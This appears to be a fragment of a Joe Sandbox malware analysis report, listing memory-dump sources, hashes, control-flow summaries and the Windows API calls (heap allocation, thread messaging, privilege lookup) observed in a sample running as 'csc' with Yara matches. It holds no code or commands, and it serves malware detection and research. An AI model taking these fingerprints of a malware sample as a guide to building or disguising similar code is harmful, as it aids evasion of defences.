                                                                                                                                                                        • Instruction ID: e69121020fd4f5a2f1c47832524d99f2a53db1e1f3d51a26d6d74bf6b787e6d5
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d63af0f16ba26e89763d08fa87002c15c3e2858b6d0b868065174ad2b2d88d2
                                                                                                                                                                        • Instruction Fuzzy Hash: A190022234140003D140755854586165015D7E2301F99D011E4414754DDE1589569326
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: ef8cf03908365b1cc1ae741c181f07c780a3e908589a64b258db5e8c9b1eb4b5
                                                                                                                                                                        • Instruction ID: c66fd840b1d71bf2188eb34655399e6e20ea6b14b5994a62efa2fc4bf636528b
                                                                                                                                                                        • Opcode Fuzzy Hash: ef8cf03908365b1cc1ae741c181f07c780a3e908589a64b258db5e8c9b1eb4b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6190022A25340003D1807558544861A101587D2202FD9D415A4015758DCE1589699325
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 86b27c05bf364befdd65ccf1c5387e23b12fa7d3b9fc8c13d5c6b46fcac0d816
                                                                                                                                                                        • Instruction ID: 0fc4998652220c9dfb0e3073a39233c1e612adac8a7c5fea8f8d5d47379da4fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 86b27c05bf364befdd65ccf1c5387e23b12fa7d3b9fc8c13d5c6b46fcac0d816
                                                                                                                                                                        • Instruction Fuzzy Hash: F590023224140413D11175584544717101987D1241FD9C412A4424758E9B568A52E225
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: dac42a001c8a6781562a9034ccaa2bd7042c99bc7dc3cbb06b8cf196f4f5399e
                                                                                                                                                                        • Instruction ID: be0200d34177c45594e7c1cf07964af3c465a847c06c2b640e40ef7f2db2204a
                                                                                                                                                                        • Opcode Fuzzy Hash: dac42a001c8a6781562a9034ccaa2bd7042c99bc7dc3cbb06b8cf196f4f5399e
                                                                                                                                                                        • Instruction Fuzzy Hash: 42900222282441535545B5584444517501697E12417D9C012A5414B50D8A269956D725
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 63ecc8cf4fadafb7da3254fe60b32c0553789e16300cb664a05d2df152b15225
                                                                                                                                                                        • Instruction ID: 46d8d30c5fb035ae0f44aed13723f4795a6054ad69501c0cc328d138b11cb867
                                                                                                                                                                        • Opcode Fuzzy Hash: 63ecc8cf4fadafb7da3254fe60b32c0553789e16300cb664a05d2df152b15225
                                                                                                                                                                        • Instruction Fuzzy Hash: 4190023224148803D1107558844475A101587D1301F9DC411A8424758E8B958991B225
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 34c1762809c0e8fcbaa01c5bef3c88a3d7d380360a334baef61f5edd387a8ca8
                                                                                                                                                                        • Instruction ID: fe7f7cd40b8e5d0dd75a16e27de0c5ddc95c1ea9aa2511dd6ce1401a003c0558
                                                                                                                                                                        • Opcode Fuzzy Hash: 34c1762809c0e8fcbaa01c5bef3c88a3d7d380360a334baef61f5edd387a8ca8
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A90023224140403D10079985448656101587E1301F99D011A9024755FCB658991A235
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: f6d6b6666144f83abc29283923f0e5a3e273f6bd5838b9b644a95cca262f355d
                                                                                                                                                                        • Instruction ID: 56b3ca4d875268a2632df501482c92708169bf6da86890cb6947e1a81848746d
                                                                                                                                                                        • Opcode Fuzzy Hash: f6d6b6666144f83abc29283923f0e5a3e273f6bd5838b9b644a95cca262f355d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A90026238140443D10075584454B161015C7E2301F99C015E5064754E8B19CD52A22A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: b3117aedd3ccd6bbf597e4d923acb7935e4b738f2824f54ba14f06ec71051259
                                                                                                                                                                        • Instruction ID: 06e75f4c1a7d5137c877eb133f1f13cb2dd3899b929d8df98433bde72380e3a1
                                                                                                                                                                        • Opcode Fuzzy Hash: b3117aedd3ccd6bbf597e4d923acb7935e4b738f2824f54ba14f06ec71051259
                                                                                                                                                                        • Instruction Fuzzy Hash: D1900222251C0043D20079684C54B17101587D1303F99C115A4154754DCE1589619625
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 2eaa63cbada869cf345bf5f8d1536347b771a307d1342918328c7420e82b9804
                                                                                                                                                                        • Instruction ID: ef1defca36a063c5978dc1e0de7951ba6f963b1764a02ccc88233c183dbb0fcd
                                                                                                                                                                        • Opcode Fuzzy Hash: 2eaa63cbada869cf345bf5f8d1536347b771a307d1342918328c7420e82b9804
                                                                                                                                                                        • Instruction Fuzzy Hash: 72900222641400434140756888849165015ABE2211799C121A4998750E8A5989659769
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 5bc12731be051e515852e73406ddb3c35768c083077a8b3b311b2ae6fd1a29cb
                                                                                                                                                                        • Instruction ID: 5cf32ebfc7dc0603bd7aa23f9d5ba192178ba3516ca5790f905c683460068511
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bc12731be051e515852e73406ddb3c35768c083077a8b3b311b2ae6fd1a29cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 5890023224180403D1007558485471B101587D1302F99C011A5164755E8B258951A675
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 927301794b2cfb6129d3acb8cd4f30f0ee4dedfe4bdaa6daad41ff44e713f5dd
                                                                                                                                                                        • Instruction ID: 99b7b1f874a1a7ec982b9d2655b8e28efd9e622864f7f1cc0ed42b12dd36962a
                                                                                                                                                                        • Opcode Fuzzy Hash: 927301794b2cfb6129d3acb8cd4f30f0ee4dedfe4bdaa6daad41ff44e713f5dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 6590027224140403D14075584444756101587D1301F99C011A9064754F8B598ED5A769
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: f83ffa94f2b6de3551abd1ce9256e4a6ab2b7132c125c9dac542185b68a0f6e2
                                                                                                                                                                        • Instruction ID: aeb8ce6f36c1e5bce16ba775255c90f20e0e3cce8d52cd80a5872476966d4894
                                                                                                                                                                        • Opcode Fuzzy Hash: f83ffa94f2b6de3551abd1ce9256e4a6ab2b7132c125c9dac542185b68a0f6e2
                                                                                                                                                                        • Instruction Fuzzy Hash: D490022264140503D10175584444626101A87D1241FD9C022A5024755FCF258A92E235
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 6f5600a9663d1fd72dcc823d0093268aa0c0ac3ae1eeedf3a23ccb2c3d541521
                                                                                                                                                                        • Instruction ID: fec3725cb9a763afea0572add02936e801ece8a4ae0ddbf394832aab69792ecc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5600a9663d1fd72dcc823d0093268aa0c0ac3ae1eeedf3a23ccb2c3d541521
                                                                                                                                                                        • Instruction Fuzzy Hash: 7690026224240003410575584454626501A87E1201B99C021E5014790ECA258991A229
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: f3e48d343f53a5a9e17c8ff46bfa7f79a01826c622f7f3bcc3aa228993715f65
                                                                                                                                                                        • Instruction ID: 00f914185bc817edaf9276f0d1a200bb870ac001659a7f6fe6f88e09e7cb6529
                                                                                                                                                                        • Opcode Fuzzy Hash: f3e48d343f53a5a9e17c8ff46bfa7f79a01826c622f7f3bcc3aa228993715f65
                                                                                                                                                                        • Instruction Fuzzy Hash: ED90023224140803D1807558444465A101587D2301FD9C015A4025754ECF158B59B7A5
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                        • Opcode ID: 01f043b77cab89314a7de5a14c533dee15ee78f2364bf9083f165b44cc59ad17
                                                                                                                                                                        • Instruction ID: af4dce7625806dade524113889601014407f2c9bbff1ee26cf009e958f85eefb
                                                                                                                                                                        • Opcode Fuzzy Hash: 01f043b77cab89314a7de5a14c533dee15ee78f2364bf9083f165b44cc59ad17
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C900226251400030105B9580744517105687D6351399C021F5015750DDB2189619225
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                                                                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 210 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID: 6EA
                                                                                                                                                                        • API String ID: 1279760036-1400015478
                                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 213 41a6ab-41a6ac 215 41a64c-41a661 RtlAllocateHeap 213->215 216 41a647 call 41af60 213->216 216->215
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID: 6EA
                                                                                                                                                                        • API String ID: 1279760036-1400015478
                                                                                                                                                                        • Opcode ID: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                        • Instruction ID: ca5c2ad009bb5830261af26d6cd8d5f5f20ef4a650c85af14dc2c9a9921a2f81
                                                                                                                                                                        • Opcode Fuzzy Hash: 765c4e68831acc91f9fb08e760deeabccbeb69a3863e01e0beb469382330cd47
                                                                                                                                                                        • Instruction Fuzzy Hash: 32D02BF91092845FD700DF74DD808DB7754AF85318738844EF84D03303C130D426A6B2

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 419 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 428 40835c-40836e PostThreadMessageW 419->428 429 40838e-408392 419->429 430 408370-40838a call 40a480 428->430 431 40838d 428->431 430->431 431->429
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                        • Opcode ID: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                                                                                                                                                        • Instruction ID: deec3d3271cf7ae617df0fac63ab8d80f0a55d98960cf64c01aa098855739ce5
                                                                                                                                                                        • Opcode Fuzzy Hash: aaf447e7e3095c17f08ce8e9d0f214d310877f86eeb7b00165297c6954b8b0b0
                                                                                                                                                                        • Instruction Fuzzy Hash: DE01B531A8032976E721A6A59C43FEE772CAB41B54F14015EFE04BA1C2E6A8690547EA

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 434 408310-40831f 435 408328-40835a call 41ca00 call 40acf0 call 414e50 434->435 436 408323 call 41be60 434->436 443 40835c-40836e PostThreadMessageW 435->443 444 40838e-408392 435->444 436->435 445 408370-40838a call 40a480 443->445 446 40838d 443->446 445->446 446->444
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                                                                                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 464 41a7c2-41a7c9 465 41a7a3-41a7c0 464->465 466 41a7cb-41a7ea call 41af60 464->466 469 41a7ef-41a804 LookupPrivilegeValueW 466->469
                                                                                                                                                                        APIs
                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                        • Opcode ID: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                        • Instruction ID: 23f3b5c59c3bf1b946c484d1dd1b09d9bbd519211ec81ee406c7880a26dda3c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF022B62002086BDB10DFA9DC80EE73369EF89720F04864AFD1C47281C534E8158BB0
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_csc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
